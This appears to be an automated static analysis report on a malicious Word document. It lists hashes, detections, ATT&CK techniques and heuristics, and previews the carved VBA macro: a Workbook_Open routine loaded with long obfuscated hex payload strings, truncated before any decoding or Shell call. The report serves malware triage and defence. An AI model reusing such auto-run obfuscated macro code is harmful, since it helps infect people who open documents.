Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e0246e25f267a86…

MALICIOUS

Office (OLE)

94.0 KB Created: 2018-02-22 07:51:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 7c9b683835d9a17ffd68b9b31ad8d54f SHA-1: f856b0a21ae9b86c79f78dfa33b523b888bb7544 SHA-256: 3e0246e25f267a8673a55876b042f20bee8f1abd8ec631f65986bef6ce6566d8
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Workbook_Open macro that uses the Shell() function, indicating it is designed to execute arbitrary code at document open. The extracted macro source (carved as 'macros.bas') together with the ClamAV detection 'Xls.Malware.Cwsp-6735643-0' strongly suggests malicious intent. The script likely downloads and executes a second-stage payload, a common technique for malware delivery.

Heuristics 7

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8800 bytes
SHA-256: b5d720f3975f0ec8ab6407088366f41382e43068f14233af14c047056fdc020e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module header of the carved VBA source (named "ThisDocument"
' per VB_Name above). The procedure that follows declares a series of String
' variables initialised with long hex-looking literals; this preview shows only
' the first lines and is truncated before the procedure body ends, so what the
' literals decode to is not visible here. NOTE(review): the report attributes a
' Shell() call to this module (OLE_VBA_SHELL) — confirm against the full
' extracted source rather than this preview.
Option Explicit
Sub Workbook_Open()
Dim KLY_VY As String
KLY_VY = "797279B48D797979A4798B798379A66190797F797D4B799479837979727979987988796EB54783AB793B794D7962797964933A7961799CA279797972796B534079AE7979795D717955797B7979797979797979477178797FAE79864B7979799B797979B270795346795B797A533A7979757EB0778D799E777F79799"
Dim PH_FJH As String
PH_FJH = "43B795C6579794A797979658A799D6D7986AD7953797A535D7B79757979793D7979897979797985794B3D5C3A4379795279797979797979A97955A179873D797979B179797952794B77896CA879AE796A5357B2797979B679796A54A67959B65F7960B95A8A79797A794F79827979795679A0A579797A797679B679"
Dim HU_J As String
HU_J = "79794C46795379798B7144797958798F61A8796F5079797979924279815EA979797979AF75A04F6E798779797979A98E7079AB798D7949798B6482AD7955B4613F79637998793A794E866D747979A94A7079797C797A797979757979426B7079537979657679797979796E79A79DB4793E7979B679808A8C7466AD7"
Dim GG_AE As String
GG_AE = "96E794654799A7947797D799579AD79464D997979567990877979798C797949554A79437953794679A6797979765B59799C7F60797979524279797DB83B796D8C05854CA46E796F8D798F6279B14A797979797D797C6978793B3E877979797979A854797946A2688D79B479B67947777979793B79797996469EA26A"
Dim U_X As String
U_X = "797979A379A379979AF0797979797974F8797979797979798E7979797991797979797996793FA4453B79795C8379AFA44E79797979797945794779797C794D797972AD796E42795B79796F796C793B797979797979537979558A79797982796979AD98A73C797962797979AC7979B045476879798C7979877979795"
Dim Y_BN As String
Y_BN = "2798879483F73795C797949794779796D56A071B0B37979534E988DAD7959A17979798FA78D79A679558EB1795879A646796B6E79A77979B17979798479AE5A8F79797C7979977979955FAE7B795D7979A179796D617979A87979797979793D9E796E79B179797974404CB3AC80B67946877979676979793D796D79"
Dim ZH_MUN As String
ZH_MUN = "A1AA796B79955B796A54795BB5AA79799979B07950B8B0793F797979754177794C3CA38479653DB0A479467964793C7979B48B798B79A07979B879AF7979797998796E4F424184794D79798BB279795179797979794A3D79797979423B793C627979797979AD4079797979417978795298859F794379796B9A45477"
Dim FN_ZC As String
FN_ZC = "979B9A07979794E797953796F496B58799E7979797A796C796979796779A0A3794D919E794179793E7992854A79794C79798B79797981796E79B579B1959779B79B7979469763687979798B5B797A79B3794F7979514979A6665079B3797979AC797992798261AF406899794C79797979A97979B9797972796B4C8F"
Dim HS_XVQ As String
HS_XVQ = "978D7979A9499C6B79798A797979946E76627979797979794D5A41514E5A7979AC79797988794879A1797953817F79796679799C7979B79B894B99796A6D48785279AD79797983AD8879797979547879795949547945A279797D767971AA797969A88B9C8D796C79AE7A6879907243AD79768279687941794479747"
Dim RXK_BBS As String
RXK_BBS = "F79AB76797957798D79794C79A879797979AC737978796279796BA17992B27979563D3E8A797279797979796F3B7991B179886C7945796C7B7979AAB279527961AE798B79797979A979597997797979797979438079799A79795479507973AF793BA8797971B2797979797979797965B4795879797979797982796B"
Dim HI_EW As String
HI_EW = "79B7603D797979799379597979867EB2799F79795C79B8795D817955507946A27979793FB079AF7996797965797950AA9C8F7963798E4950797F79A879A27979797982B2783C79797971AE588C68736A8579797979797979406A54414E797974AD794079795D8C53737956797979517977797953797979767972797"
Dim KZZ_PB As String
KZZ_PB = "9797D7979796C6C9C8D79A879637979799352AE797D7979795D794177799A8A7979794D7979AD79705479796479797979797E586F3A798B7949A395507979A1926E7979796D3A798D624879AEAD5061814579566C79794BC87944B95AAA79B179B53B797D8E797D69797979F28C6D795F8560AF797979799779AA6D"
Dim BZK_F As String
BZK_F = "798A7679794F6F3E797C793C793B725E797479858B7965793F63518E916187797959799B63797679797979AD5E797979745D785E79794A79797957799955797D68791379B587797979A88CAE79573E48797972798B6B798B795579797979A37979407979797995793E91AA7979795F7B50B6799C7979ABA17964A6A"
Dim Y_L As String
Y_L = "59979793E987979B5B38579AA74797979657970798179A47040844C79737979A479507979B9746279796B7979A94FB27979AB
... (truncated)